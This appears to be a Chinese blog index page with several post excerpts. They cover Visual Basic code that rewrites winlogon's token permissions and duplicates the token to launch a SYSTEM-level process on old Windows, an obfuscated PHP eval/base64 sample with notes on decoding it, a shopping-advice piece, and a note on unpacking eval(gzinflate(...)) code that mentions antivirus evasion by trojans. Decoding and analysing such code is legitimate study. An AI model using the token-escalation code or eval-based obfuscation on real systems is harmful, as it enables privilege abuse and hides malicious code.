小强工作室

核心代码:
仅支持2000,XP,2003系统

Public Function CreateSystemProcess(ByVal szProcessName As String) As Boolean
    Dim hProcess As Long, dwPid As Long, hToken As Long, hNewToken As Long, pOrigSd As SECURITY_DESCRIPTOR, pNewSd As SECURITY_DESCRIPTOR, dwSDLen As Long, bDAcl As Long, pOldDAcl As ACL, bDefDAcl As Long
    Dim dwRet As Long, pNewDAcl As ACL, pSacl As ACL, dwSidOwnLen As Long, dwSidPrimLen As Long, si As STARTUPINFO, pi As PROCESS_INFORMATION, bError As Boolean
    Dim ea As EXPLICIT_ACCESS, hOrigSd As Long, hOldDAcl As Long, hNewDAcl As Long, dwAclSize As Long, dwSaclSize As Long
    Dim hSacl As Long, hSidOwner As Long, hSidPrimary As Long, hNewSd As Long, lngErr As Long
    Dim hea As Long, hToken1 As Long, pSidOwner As SID, pSidPrimary As SID, ct As SECURITY_DESCRIPTOR
    Dim hSacl1 As Long, hSidOwner1 As Long, hSidPrimary1 As Long
    '提高进程权限为Debug权限
    If Not EnablePrivilege Then
        bError = True
        GoTo Cleanup
    End If
    '得到winlogon的进程ID
    dwPid = GetSystemProcessID
    If dwPid = 0 Then
        bError = True
        GoTo Cleanup
    End If
    '得到句柄
    hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, False, dwPid)
    If hProcess = 0 Then
        bError = True
        GoTo Cleanup
    End If
    '得到hToken
    If OpenProcessToken(hProcess, READ_CONTROL Or WRITE_DAC, hToken) = 0 Then
        bError = True
        GoTo Cleanup
    End If
    '设置 ACE 具有所有访问权限
    BuildExplicitAccessWithName ea, "Everyone", TOKEN_ALL_ACCESS, GRANT_ACCESS, 0
    Debug.Print ea.grfAccessMode
    '第一次调用肯定错误,目的是为了得到dwSDLen的值
    If GetKernelObjectSecurity(ByVal hToken, DACL_SECURITY_INFORMATION, ByVal hOrigSd, ByVal 0, dwSDLen) = 0 Then
        lngErr = GetLastError()
        Debug.Print "GetLastError: " & lngErr
        Debug.Print "dwSDLen值为: " & dwSDLen
'        If lngErr = ERROR_INSUFFICIENT_BUFFER Then
            hOrigSd = HeapAlloc(GetProcessHeap, HEAP_ZERO_MEMORY, dwSDLen)
            '再次调用取得正确得到安全描述符hOrigSd
            If GetKernelObjectSecurity(ByVal hToken, DACL_SECURITY_INFORMATION, ByVal hOrigSd, ByVal dwSDLen, dwSDLen) = 0 Then
                bError = True
                GoTo Cleanup
            End If
'        Else
'            bError = True
'            GoTo Cleanup
'        End If
    Else
        bError = True
        GoTo Cleanup
    End If
    '得到原安全描述符的访问控制列表 ACL
    If GetSecurityDescriptorDacl(ByVal hOrigSd, bDAcl, hOldDAcl, bDefDAcl) = 0 Then
        bError = True
        GoTo Cleanup
    End If

    '生成新 ACE 权限的访问控制列表 ACL
    dwRet = SetEntriesInAcl(ByVal 1, ea, hOldDAcl, hNewDAcl)
    If dwRet <> ERROR_SUCCESS Then
        hNewDAcl = 0
        bError = True
        GoTo Cleanup
    End If
    '第一次调用给出的参数肯定返回这个错误，这样做的目的是为了创建新的安全描述符 hNewSd 而得到各项的长度
    If MakeAbsoluteSD(ByVal hOrigSd, ByVal hNewSd, dwSDLen, ByVal hOldDAcl, dwAclSize, ByVal hSacl, dwSaclSize, ByVal hSidOwner, dwSidOwnLen, ByVal hSidPrimary, dwSidPrimLen) = 0 Then
        lngErr = GetLastError()
        Debug.Print "GetLastError: " & lngErr
        Debug.Print "hNewSd: " & hNewSd
        Debug.Print "hNewDAcl: " & hNewDAcl
        'If lngErr = ERROR_INSUFFICIENT_BUFFER Then
            hOldDAcl = HeapAlloc(GetProcessHeap, HEAP_ZERO_MEMORY, ByVal dwAclSize)
            hSacl = HeapAlloc(GetProcessHeap, HEAP_ZERO_MEMORY, ByVal dwSaclSize)
            hSidOwner = HeapAlloc(GetProcessHeap, HEAP_ZERO_MEMORY, ByVal dwSidOwnLen)
            hSidPrimary = HeapAlloc(GetProcessHeap, HEAP_ZERO_MEMORY, ByVal dwSidPrimLen)
            hNewSd = HeapAlloc(GetProcessHeap, HEAP_ZERO_MEMORY, ByVal dwSDLen)
            Debug.Print "调用MakeAbsoluteSD成功之后dwSDLen值为: " & dwSDLen
            '再次调用才可以成功创建新的安全描述符 hNewSd但新的安全描述符仍然是原访问控制列表 ACL
            If MakeAbsoluteSD(ByVal hOrigSd, ByVal hNewSd, dwSDLen, ByVal hOldDAcl, dwAclSize, ByVal hSacl, dwSaclSize, ByVal hSidOwner, dwSidOwnLen, ByVal hSidPrimary, dwSidPrimLen) = 0 Then
                bError = True
                GoTo Cleanup
            End If
            Debug.Print "hNewSd: " & hNewSd
            Debug.Print "hNewDAcl: " & hNewDAcl
'        Else
'            bError = True
'            GoTo Cleanup
'        End If
    End If

    '将具有所有访问权限的访问控制列表 hNewDAcl 加入到新的hNewSd中
    If SetSecurityDescriptorDacl(hNewSd, bDAcl, hNewDAcl, bDefDAcl) = 0 Then
        bError = True
        GoTo Cleanup
    End If

    '将新的安全描述符加到 TOKEN 中
    If SetKernelObjectSecurity(hToken, DACL_SECURITY_INFORMATION, ByVal hNewSd) = 0 Then
        bError = True
        GoTo Cleanup
    End If
    '以所有权限方式再次打开winlogon.exe为复制权限作准备
    If OpenProcessToken(ByVal hProcess, TOKEN_ALL_ACCESS, hToken) = 0 Then
        bError = True
        GoTo Cleanup
    End If

    '复制一份具有相同访问权限的 TOKEN
    If DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, ByVal 0, ByVal SecurityImpersonation, ByVal TokenPrimary, hNewToken) = 0 Then
        bError = True
        GoTo Cleanup
    End If
    '不虚拟登陆用户的话，创建新进程会提示1314 客户没有所需的特权错误
    Call ImpersonateLoggedOnUser(hNewToken)
    '利用具有所有权限的 TOKEN，创建高权限进程
    If CreateProcessAsUser(hNewToken, vbNullString, szProcessName, ByVal 0&, ByVal 0, False, ByVal 0&, vbNullString, vbNullString, si, pi) = 0 Then
        bError = True
        GoTo Cleanup
    End If
    bError = False
Cleanup:
'    On Error Resume Next
    If hOrigSd Then HeapFree GetProcessHeap, 0, hOrigSd
    If hNewSd Then HeapFree GetProcessHeap, 0, hNewSd
    If hSidPrimary Then HeapFree GetProcessHeap, 0, hSidPrimary
    If hSidOwner Then HeapFree GetProcessHeap, 0, hSidOwner
    If hSacl Then Call HeapFree(GetProcessHeap, 0, hSacl)
    If hOldDAcl Then Call HeapFree(GetProcessHeap, 0, hOldDAcl)
    Call CloseHandle(pi.hProcess)
    Call CloseHandle(pi.hThread)
    Call CloseHandle(hToken)
    Call CloseHandle(hNewToken)
    Call CloseHandle(hProcess)
    If (bError) Then
        CreateSystemProcess = False
    Else
        CreateSystemProcess = True
    End If
End Function

下面是工程

阅读全部 ...

密文类似这样:

<?php $OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63 %6f%5f%73%61%64%66%70%6e%72');$OO00O0000=26408;$OOO0000O0=$OOO000000{4}.$OOO00 0000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$ OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO0000 00{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('J E9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09 PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PM E8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJE9PTzAwMDAwMHsyMH0uJE9PTzA wMDAwMHs1fS4kT09PMDAwMDAwezl9LiRPT08wMDAwMDB7MTZ9OyRPTzBPTzAwTzA9JE9PTzAwMDAwM HsxNH0uJE9PTzAwMDAwMHswfS4kT09PMDAwMDAwezIwfS4kT09PMDAwMDAwezB9LiRPT08wMDAwMDB 7MjB9OyRPTzBPTzAwME8oJE8wMDBPME8wMCwxMTgyKTskT08wME8wME8wPSgkT09PMDAwME8wKCRPT zBPTzAwTzAoJE9PME9PMDAwTygkTzAwME8wTzAwLDkwOCksJ0kvTU5LQUNkVlJHUXlEV1VncTY4d3B rYXpMTzVsdG5tVEIrMGJ2OXVIcnhGN1hTWTFFM2ZaaGlqYzRlMm9Kc1A9JywnQUJDREVGR0hJSktMT U5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZ hbCgkT08wME8wME8wKTs=')));return;?> tiBr5CwHGMBrljDvtMTb6AqwwAJ8qpRkqpRmpbA6wh7uwZp6pbp6aZ4/8wwua6brR+zHVkp3LktrGMl HGMcxaMcrUiqHzkvSzk4lQ9DY56voGMBlQ+rlaMcrUiBFyuDH5jplQ9DY56voGMBlQ+rlaMcrUiEYzi A7OCJftMbuQMqVpAqgahDAwvLAwvJkgpR8k3t8qpRkqpRm8bADq6ttG6brmd1HGCvflipZGMqmwZp6p bp6k3tVpAqgaZBUwhgua6brR+zHVkp3LktrGMlHGMcxaMcrUiqHzkvSzk4lQ9DY56voGMBlQ+r ....

分析: 1.首先看文件被分为两个部分,一部分被<?php ?>标签包围,这里应该是可执行代码,紧接着是一串类似Base64的文本,但用Base64_Decode()无法解出内容. 2.发现可执行文件部分使用了eval()函数,将eval修改成echo后把结果替换到原来eval的位置结果如下:

阅读全部 ...

直接右键 添加到收藏夹

PS:为了防止资源浪费,本链接能用在我的网盘里,如需了解原理,请自行分析源码.
PS2:我用了301重定向+正则表达式

“道高一尺魔高一丈，买的没有卖的精”等俗语都是在宣扬奸商的强势以及消费者的弱势。在笔者走访市场调查行情时也会经常遇到“小白”消费者在奸商的淫威下被糊弄的一塌糊涂，所以笔者经过长达两个月的收集总结将网友、同事等诸多长年在卖场中打拼的经验汇集成此语录，帮助消费者走出奸商的圈套。让消费者可以在卖场做到舌战群雄的境界。进而让消费者远离被骗的弱势局面，也可以帮助朋友在市场购买IT产品时锄强扶弱。

注：本文图片部分出自影视剧与网络，纯属娱乐。


不要事后再后悔

本文语录基本用的都是键鼠为主的奸商常用语句，不过其通用性高达99%。熟读此文可以尽可能的避免被忽悠的可能性，绝对是家居旅行、市场选购的必备宝典。

下面精彩即将开始……

阅读全部 ...

PHP使用eval(gzinflate(str_rot13(base64_decode('BASE64加密后内容'))))核心代码的解密 下非扩展方式的PHP加密方法： 这里有个在线的，还不错。木马防杀还行，要保护代码可就不行了。 对应的写了一个简单的解密的， 专门针对eval。这个原理很有用途。 特别说明:此解密程序好像一定得在PHP5上面使用, 我在PHP4上面测试eval(gzinflate(str_rot13(base64_decode('BASE64加密后内容'))))内加密的代码始终无法正常解密.

阅读全部 ...